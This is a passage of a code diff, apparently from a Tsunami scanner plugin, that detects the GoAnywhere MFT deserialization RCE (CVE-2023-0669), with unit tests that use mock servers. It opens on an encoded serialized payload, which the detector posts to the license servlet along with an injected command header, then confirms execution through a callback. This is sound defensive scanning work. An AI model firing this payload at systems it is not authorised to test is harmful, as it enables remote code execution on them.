GGY5iBnjxinzh67mODT_vohU7L3gPCkVnqcU2zUbiBsT-Xu0HGyQOPpBp5wS2QHln6GdmTkmARnSa4Mc1CU0x4YzmAoTU4v8xLCtucHHFHrYMB_MFJg_2rM_XxJVKjnU2ej7BFSbnyc_1XE12z9ca6dYywmwtTFtHSpJf-70SBU_nebcnTcUXMp2JTWdRUgGScybrwM4wGSYUq7THJqm297dQ9fJ9GjnWLOK3JQ7K2GjVWWmXKrlYlwKgx_3XDUUYErlZAw13_iQXLMZOUteWthVndxp9STpcQ"; + try { + HttpResponse httpResponse = + httpClient.send( + post(licenseUrl) + .setHeaders( + HttpHeaders.builder() + .addHeader( + "Content-Type", + "application/x-www-form-urlencoded; " + "charset=UTF-8") + .addHeader(COMMAND_HEADER, commandToInject) + .build()) + .setRequestBody(ByteString.copyFromUtf8(deserialized)) + .build(), + networkService); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Request to target %s failed", networkService); + } + return payload.checkIfExecuted(); + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE-2023-0669")) + .addRelatedId( + VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-0669")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2023-0669: GoAnywhere MFT RCE vulnerability") + .setDescription( + "GoAnywhere MFT suffers from a pre-authentication command injection " + + "vulnerability in the License Response Servlet due to deserializing" + + " an arbitrary attacker-controlled object.All versions prior to 7.1.1 are affected") + .setRecommendation( + "Update GoAnywhere MFT to a version that provides a fix 7.1.2 or later")) + .build(); + } +} diff --git a/community/detectors/goanywhere_cve_2023_0669/src/test/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorWithCallbackServerTest.java b/community/detectors/goanywhere_cve_2023_0669/src/test/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorWithCallbackServerTest.java new file mode 100644 index 000000000..89cd7a18c --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/src/test/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorWithCallbackServerTest.java @@ -0,0 +1,129 @@ +package com.google.tsunami.plugins.detectors.goanywhere; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.*; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +@RunWith(JUnit4.class) +public class Cve20230669DetectorWithCallbackServerTest { + + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2024-09-24T00:00:00.00Z")); + + @Inject private Cve20230669VulnDetector detector; + private MockWebServer mockWebServer; + private MockWebServer mockCallbackServer; + private NetworkService service; + + // A version of secure random that gives predictable output for our unit tests + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + mockWebServer.start(); + mockCallbackServer = new MockWebServer(); + mockCallbackServer.start(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new Cve20230669DetectorBootstrapModule()) + .injectMembers(this); + + service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("goanywhere")) + .setServiceName("http") + .build(); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws IOException { + mockWebServer.enqueue(new MockResponse().setResponseCode(HttpStatus.OK.code())); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .build(); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE-2023-0669")) + .addRelatedId( + VulnerabilityId.newBuilder() + .setPublisher("CVE") + .setValue("CVE-2023" + "-0669")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2023-0669: GoAnywhere MFT RCE vulnerability") + .setDescription( + "GoAnywhere MFT suffers from a pre-authentication command injection " + + "vulnerability in the License Response Servlet due to " + + "deserializing an arbitrary attacker-controlled object.All versions prior to 7.1.1 are affected") + .setRecommendation( + "Update GoAnywhere MFT to a version that " + + "provides a fix 7.1.2 or later")) + .build()); + } + + @Test + public void detect_whenNotVulnerable_returnsnoVulnerability() throws IOException { + mockWebServer.enqueue( + new MockResponse().setResponseCode(HttpStatus.SERVICE_UNAVAILABLE.code())); + + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .build(); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } +}